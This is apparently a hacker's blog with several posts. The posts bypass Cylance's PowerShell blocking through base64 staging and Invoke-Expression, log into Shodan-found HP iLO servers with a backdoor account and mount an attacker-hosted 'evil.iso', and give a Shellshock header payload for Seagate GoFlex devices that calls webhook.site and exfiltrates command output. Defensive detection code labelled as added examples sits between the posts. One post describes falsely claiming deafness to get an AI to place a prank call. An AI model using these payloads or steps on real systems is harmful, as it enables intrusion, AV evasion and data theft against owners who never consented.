Monday, August 25, 2025

When AI Just Doesn’t Get the Joke.

Like many of us, I’ve been exploring creative (and occasionally mischievous) ways to test the limits of AI. Recently, I thought it would be fun to combine AI with TTY services to pull a classic prank call on my wife while she was at work. Spoiler alert: it was a complete failure.

My first prompt went something like this:
My wife works at [location]. Make a call to that place, get details about the menu and bar, then casually ask about Battletoads.

The response? A polite but firm “I can’t make calls,” followed by a broken link and a handful of unrelated suggestions that didn’t come close to enabling the harmless mischief I had in mind.

I tried again with a different angle:
I’m deaf, can you connect to a TTY service to make a call?

Same result: dead links and unusable advice. After a few more prompts and experiments, it became clear—AI might be powerful, but it has no concept of fun.

Now, I never truly expected AI to get humor the way we do, but I did hope it might at least help facilitate it. Instead, when I asked whether prank calling or even the legendary art of phreaking was still alive, AI’s answer was essentially: not really.

And that’s when it hit me: while AI can automate tasks, analyze data, and streamline workflows, some things are just better left to people. Humor, spontaneity, and a little harmless mischief? That’s our domain.

So here’s my takeaway: AI is a great tool, but it doesn’t replace human creativity, playfulness, or the shared cultural quirks that make us laugh. Those belong to us.

And on that note… is your refrigerator running?

Friday, March 28, 2025

Bypass Cylance AV to run PowerShell Scripts.

So I was trying to automate the installation of some software using PowerShell (PS). Naturally I wrote a PS script, but when I attempted to run it on machines with Cylance installed it was blocked by Cylance, which complained that it does not like me trying to run PS scripts.

Challenge accepted! 

My first attempt was to use EncodedCommand, but I wasted a bunch of time and gave up, lol. It has to be, what I would say is, a non-standard base64 encoding to execute. Didn't find that out until I was a few hours in! Trying to find an easy way to encode never panned out; even the great CyberChef failed me.


So I couldn't run PS scripts outright and didn't have time for EncodedCommand (I'm sure I was just doing something wrong), so I moved on to Invoke-Expression (IE).


M$ says, "The Invoke-Expression cmdlet evaluates or runs a specified string as a command and returns the results of the expression or command. Without Invoke-Expression, a string submitted at the command line is returned (echoed) unchanged." 


So we can use IE to execute any string. First I tried to just put my script in a variable, but PS never liked it; I think the line breaks or some char was messing it up. Then I looked at reading a file and putting it into a variable. So I base64 encoded the text from my script and used [Convert]::FromBase64String to decode it, then wrote it to a file in C:\Users\Public\ because I couldn't be sure what user context it was going to run in, so I bet on low privileges. Then I used Get-Content -Raw to pull it into a variable, passed it to IE and whammy! It worked. The most complicated process I could come up with to bypass Cylance PS script blocking :)
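From the defender's side, the two things worth having when this pattern shows up in PowerShell logs are a decoder for -EncodedCommand (PowerShell expects base64 of the UTF-16LE bytes of the command, not of the plain ASCII text, which is why a generic base64 tool's output does not run) and a scorer that looks for the staged-loader combination described above: FromBase64String, a staging file under C:\Users\Public\, Get-Content -Raw, and Invoke-Expression. The Python below is an added example, not code from the post; the script-block samples and the encoded string are constructed, and the indicator list and scoring threshold are my own assumptions. Script Block Logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) records the text that Invoke-Expression actually evaluates, so that is the natural input for score_script_block.

```python
import base64
import re

# Indicators of the staged-loader pattern the post describes: a base64 blob is decoded
# in-process, dropped in a world-writable folder, read back whole with Get-Content -Raw
# and handed to Invoke-Expression. Each regex carries the reason it is interesting.
# (Assumed indicator set for this example.)
INDICATORS = [
    (re.compile(r"\[Convert\]::FromBase64String", re.I), "inline base64 decode"),
    (re.compile(r"Get-Content\s+-Raw\b", re.I), "whole file read into one string"),
    (re.compile(r"\b(Invoke-Expression|iex)\b", re.I), "string evaluated as code"),
    (re.compile(r"C:\\Users\\Public\\", re.I), "staging file under a world-writable path"),
]

# Constructed samples (not from the post). The first resembles what Script Block
# Logging (Event ID 4104) would record for the loader's final step; the second is an
# ordinary config read that also uses Get-Content -Raw and must not be flagged.
SUSPICIOUS_BLOCK = (
    "$s = Get-Content -Raw 'C:\\Users\\Public\\stage.txt'\n"
    "Invoke-Expression $s\n"
)
BENIGN_BLOCK = "$cfg = Get-Content -Raw .\\config.json | ConvertFrom-Json\n"

# Constructed -EncodedCommand argument: base64 of the UTF-16LE bytes of "iex".
SAMPLE_ENCODED = "aQBlAHgA"


def decode_encoded_command(b64: str) -> str:
    """Recover the script text from a powershell -EncodedCommand argument.

    PowerShell expects base64 of the UTF-16LE encoding of the command, not of the
    ASCII/UTF-8 text, so a blob produced by a generic base64 tool will not run.
    """
    return base64.b64decode(b64).decode("utf-16-le")


def score_script_block(text: str) -> dict:
    """Return which indicators match and whether the block warrants a closer look.

    A single indicator is common in benign scripts; the combination of evaluating a
    string as code with at least one other indicator is what marks the loader pattern.
    """
    hits = [reason for rx, reason in INDICATORS if rx.search(text)]
    suspicious = "string evaluated as code" in hits and len(hits) >= 2
    return {"suspicious": suspicious, "hits": hits}


if __name__ == "__main__":
    print(decode_encoded_command(SAMPLE_ENCODED))
    for block in (SUSPICIOUS_BLOCK, BENIGN_BLOCK):
        print(score_script_block(block))
```

The threshold (Invoke-Expression plus one more indicator) is deliberately loose; on a real estate you would tune it against the scripts your own automation legitimately runs, since Get-Content -Raw on its own is everywhere.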


Enjoy the 1's and 0's

Tuesday, February 18, 2025

IPMI exposure over the internet, IPMIPWN & post compromise activities.


Another stop along memory lane is my favorite thing to boast about, IPMIPWN! :P

I thought I would dive back into Shodan and check out the status of the attack surface after all this time. As expected, still stocked with targets! So this time around I wanted to take a look beyond penetration and look at post-compromise activity.

It's been a while since I first made IPMIPWN, so a few things have changed. The servers out there are so old that the ciphers used for ssh are no longer supported by modern desktop ssh clients by default, so my first ssh attempt post IPMIPWN hax0rin went much like the below:
ssh backdoor2@target.com
Unable to negotiate with target.com port 22: no matching key exchange method found. Their offer: diffie-hellman-group14-sha1,diffie-hellman-group1-sha1

Google said to add -o KexAlgorithms=diffie-hellman-group14-sha1. Then:

ssh -o KexAlgorithms=diffie-hellman-group14-sha1 backdoor2@target.com

Unable to negotiate with target.com port 22: no matching host key type found. Their offer: ssh-dss

And then:

ssh -o KexAlgorithms=diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-dss backdoor2@target.com

Unable to negotiate with target.com port 22: no matching cipher found. Their offer: aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc

And then:

ssh -o KexAlgorithms=diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-dss -c aes256-cbc backdoor2@target.com

Unable to negotiate with target.com port 22: no matching MAC found. Their offer: hmac-sha1 

And then:

C:\Users\hacker> ssh -o KexAlgorithms=diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-dss -c aes256-cbc -m hmac-sha1 backdoor2@target.com
The authenticity of host 'target.com' can't be established.
DSA key fingerprint is SHA256:LkuLO3/0BBf4iCXIeOO/d9kjh987trtA30pZZkS/ruc.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'target.com' (DSA) to the list of known hosts.
backdoor2@target.com's password:
User:backdoor2 logged-in to ILOBRC444.(target.com)
iLO 3 Standard 1.26 at  Aug 26 2011
Server Name: SER_EPAPAR
Server Power: On

</>hpiLO->
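The four "Their offer:" failures above are also a free inventory of what the BMC can do: every algorithm class it offers is one a modern client refuses by default. As an added example (not code from the post or from IPMIPWN), here is a small Python audit that parses those OpenSSH negotiation errors, flags each offered algorithm against a legacy table, reports whether a category offered nothing modern at all, and derives in one pass the -o options the post arrived at by four attempts. The sample lines are the post's own output; the legacy table and its reasons are my assumptions for this example.

```python
import re

# Matches the client-side negotiation failure OpenSSH prints, capturing which
# algorithm class failed and the server's full offer list.
OFFER_RE = re.compile(
    r"no matching (key exchange method|host key type|cipher|MAC) found\. Their offer: (\S+)"
)
CATEGORY = {
    "key exchange method": "kex",
    "host key type": "hostkey",
    "cipher": "cipher",
    "MAC": "mac",
}
# ssh_config option that adds an algorithm back for each category ("+" appends to
# the client's default list instead of replacing it).
OPTION = {"kex": "KexAlgorithms", "hostkey": "HostKeyAlgorithms", "cipher": "Ciphers", "mac": "MACs"}

# Assumed policy table for this example: legacy algorithms that a network-reachable
# management interface should not be limited to, with the reason.
LEGACY = {
    "diffie-hellman-group1-sha1": "1024-bit DH group with SHA-1",
    "diffie-hellman-group14-sha1": "SHA-1 in key exchange",
    "ssh-dss": "1024-bit DSA host key",
    "3des-cbc": "64-bit block cipher in CBC mode",
    "hmac-sha1": "SHA-1 based MAC",
}

# The four failures from the post, used here as sample input.
SAMPLE_NEGOTIATION = """
Unable to negotiate with target.com port 22: no matching key exchange method found. Their offer: diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
Unable to negotiate with target.com port 22: no matching host key type found. Their offer: ssh-dss
Unable to negotiate with target.com port 22: no matching cipher found. Their offer: aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc
Unable to negotiate with target.com port 22: no matching MAC found. Their offer: hmac-sha1
"""


def classify(algo: str):
    """Reason an algorithm is legacy, or None if it is acceptable."""
    if algo in LEGACY:
        return LEGACY[algo]
    if algo.endswith("-cbc"):
        return "CBC mode cipher"
    return None


def audit_offers(text: str) -> dict:
    """Per algorithm class: what the server offered, what is legacy, and whether
    nothing modern was offered at all (the BMC case in the post)."""
    report = {}
    for m in OFFER_RE.finditer(text):
        cat = CATEGORY[m.group(1)]
        algos = m.group(2).split(",")
        legacy = {a: classify(a) for a in algos if classify(a)}
        report[cat] = {
            "offered": algos,
            "legacy": legacy,
            "legacy_only": len(legacy) == len(algos),
        }
    return report


def legacy_client_options(report: dict) -> list:
    """The -o flags a maintenance client needs, derived in one pass instead of the
    post's four failed attempts; takes the first algorithm of each offer."""
    return [f"-o{OPTION[cat]}=+{info['offered'][0]}" for cat, info in report.items()]


if __name__ == "__main__":
    rep = audit_offers(SAMPLE_NEGOTIATION)
    for cat, info in rep.items():
        print(cat, info)
    print(" ".join(legacy_client_options(rep)))
```

A BMC whose every category is legacy_only is the real finding here: the firmware is from 2011 and cannot be made to negotiate anything current, so the fix is on the network side (management VLAN, no internet exposure), not on the client.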

 

Ok, so IPMIPWN got us this far, what next? A few possible attack paths might involve virtual media (VM) functionality. Here is how that might be set up:

First, see what VM is loaded, if any:

</>hpiLO-> show map1/oemhp_vm1/cddr1

Set our own VM:

</>hpiLO-> cd map1/oemhp_vm1/cddr1

</map1/oemhp_vm1/cddr1>hpiLO-> set oemhp_image=http://cracker/evil.iso

Enable our "attacker controlled" VM:

</>hpiLO-> set /map1/oemhp_vm1/cddr1 oemhp_boot=connect

Confirm our changes:

</map1/oemhp_vm1/cddr1>hpiLO-> show

I used webhook.site to confirm this attack with great success: as soon as you set oemhp_boot to connect, you should start seeing connection requests. You could also make your own Kali ISO that has a script to connect to a server somewhere, run on boot or on network connection confirmation. More attack paths later >:)


Enjoy the 1's and 0's.. 

Thursday, January 2, 2025

Happy New Year!!

 


so imma lil late, sue me :P

Wednesday, September 4, 2024

Getting a remote shell on Seagate GoFlex devices is still a thing almost ten years later!

Since I have been on a stroll down memory lane, I thought it would be fun to also revisit some of the bigger issues I have reported on in the past, like getting a remote shell on any one of 68,000+ Seagate GoFlex devices. I found these devices are still plentiful on Shodan despite all the time that has passed. That's not all: they are now easier to verify thanks to web services like webhook.site. In the past, verifying you had RCE with these devices, and with the Shellshock bug in general, could be tricky, but having something available to the public that catches callbacks makes it so much simpler.

Here is what the new payload looks like using webhook.site:

GET /support/ HTTP/1.1
Host: vuln.device.ip.here
User-Agent: () { :; }; echo Content-Type: text/plain; echo; echo;
 PATH=/usr/bin:/usr/local/bin:/bin; export PATH; wget
 http://webhook.site/866285eb-9c4f-4269-997c-6c4d3a960139/a -O /tmp/junk 2>&1;

Here is what it looks like when it hits webhook:

If you're testing this out yourself and using webhook to verify execution, and you see something like the above on your webhook session, w00t! You have just successfully verified it's vulnerable to Shellshock, it has wget installed, and it's allowed to make calls outside of its network!

Going a bit further, you can also use this Shellshock + webhook.site combo to exfiltrate some information from the target by adding the --post-data flag to the wget payload with a bash command surrounded by backticks, like this:

--post-data `id`

wget will send the output of the command as POST data to webhook :)
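The same request is just as easy to spot from the device owner's side, and the payload's shape is what gives it away: a header value that begins with a bash function definition, followed by the command to run. As an added example (not code from the post), the Python below parses a raw HTTP request head, joins folded continuation lines (the payload above is shown wrapped that way), flags any header carrying the Shellshock definition, and pulls out the embedded command, the outbound URL it contacts and whether it posts command output. The sample requests are constructed; the webhook id is a placeholder rather than the post's.

```python
import re

# A Shellshock trigger is a header value that begins with an exported function
# definition; whatever follows the closing "};" is the command bash would run.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{\s*:;\s*\}\s*;\s*(?P<cmd>.*)", re.S)
URL_RE = re.compile(r"https?://\S+")

# Constructed sample requests. The first mirrors the post's payload with the
# webhook id replaced by a placeholder; the second adds the --post-data exfil
# variant; the third is an ordinary request that must not be flagged.
SAMPLE_REQUEST = (
    "GET /support/ HTTP/1.1\n"
    "Host: vuln.device.ip.here\n"
    "User-Agent: () { :; }; echo Content-Type: text/plain; echo; echo;\n"
    " PATH=/usr/bin:/usr/local/bin:/bin; export PATH; wget\n"
    " http://webhook.site/EXAMPLE-ID/a -O /tmp/junk 2>&1;\n"
)
EXFIL_REQUEST = (
    "GET /support/ HTTP/1.1\n"
    "Host: vuln.device.ip.here\n"
    "User-Agent: () { :; }; wget --post-data `id` http://webhook.site/EXAMPLE-ID/a -O /tmp/junk\n"
)
BENIGN_REQUEST = "GET / HTTP/1.1\nHost: example.invalid\nUser-Agent: curl/8.4.0\n"


def parse_request(raw: str):
    """Split a raw HTTP/1.x request head into (request line, {lower-name: value}).

    Lines starting with a space or tab are obsolete header folding (as in the
    post's wrapped payload) and are joined onto the previous header's value.
    """
    lines = raw.strip().splitlines()
    request_line = lines[0]
    headers = {}
    last = None
    for line in lines[1:]:
        if not line.strip():
            break  # blank line ends the header block
        if line[0] in " \t" and last is not None:
            headers[last] += " " + line.strip()
            continue
        name, _, value = line.partition(":")
        last = name.strip().lower()
        headers[last] = value.strip()
    return request_line, headers


def inspect_request(raw: str) -> dict:
    """Flag Shellshock-style headers and pull out the embedded command, any
    outbound URL it contacts, and whether it posts command output."""
    request_line, headers = parse_request(raw)
    findings = []
    for name, value in headers.items():
        m = SHELLSHOCK_RE.search(value)
        if not m:
            continue
        cmd = m.group("cmd").strip()
        findings.append({
            "header": name,
            "command": cmd,
            "outbound_urls": URL_RE.findall(cmd),
            "exfil": "--post-data" in cmd,
        })
    return {"request": request_line, "shellshock": bool(findings), "findings": findings}


if __name__ == "__main__":
    for req in (SAMPLE_REQUEST, EXFIL_REQUEST, BENIGN_REQUEST):
        print(inspect_request(req))
```

Run over access logs that record full headers (or at a reverse proxy in front of the device), the outbound_urls field is the most useful output: it tells you where a compromised box was instructed to call out to, which is exactly what egress filtering on the device's network should have blocked in the first place.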

It blows my mind we can still find these on the internets, and even more so that after 9 years no one is patching anything. If you have these devices in your network, please, for the love of all that is good, update your firmware!

That's it for now, enjoy the 1's and 0's

Friday, August 2, 2024

Arctic Code Vault Contributor: ✓

Since I am on an ego trip, I thought I would gloat some more by reminding all of a tool I developed with a friend of mine called Upnp-Exploiter, back when I still ran DC414, that made it into the GitHub Arctic Code Vault! So even after the zombie apocalypse, you can use my tool :) If you don't know what the Vault project is you can read more about it Here. I am deeply honored by this and many thanks to GitHub for including our project!
That's not all for this project, however: another friend of mine caught a glimpse of it being used in a pentest by a company called TraceSecurity! Below is a screen capture of it in the pentest report :) Nothing makes me prouder than my tools being used by fellow ethical hackers. I hope they got some findings with it on another host!



That's all for now. Enjoy the 1's and 0's.

Sunday, June 30, 2024

Hack3r Achievement Obtained!


You may have seen on my X feed by now, but if not. I am proud to say my IPMIPWN tool was added to not only Kali Linux, but to BlackArch Linux as well!! This happened earlier, but I haven't bragged on the blog yet :) It's so amazing it was so well liked and used! I hope it has helped many hackers in their education and professional careers. 

If you somehow don't know about these projects, welcome skiddy and go here and here and RTFM :P 

I love giving back to the scene that has helped me so much and I am always trying to do more. Now I can say I honestly have, in an "I hope" meaningful way! Thanks to whoever found my tool worthy and all the people at the Kali and BlackArch organizations. You are all awesome! Thank you!!

Enjoy the 1's and 0's :)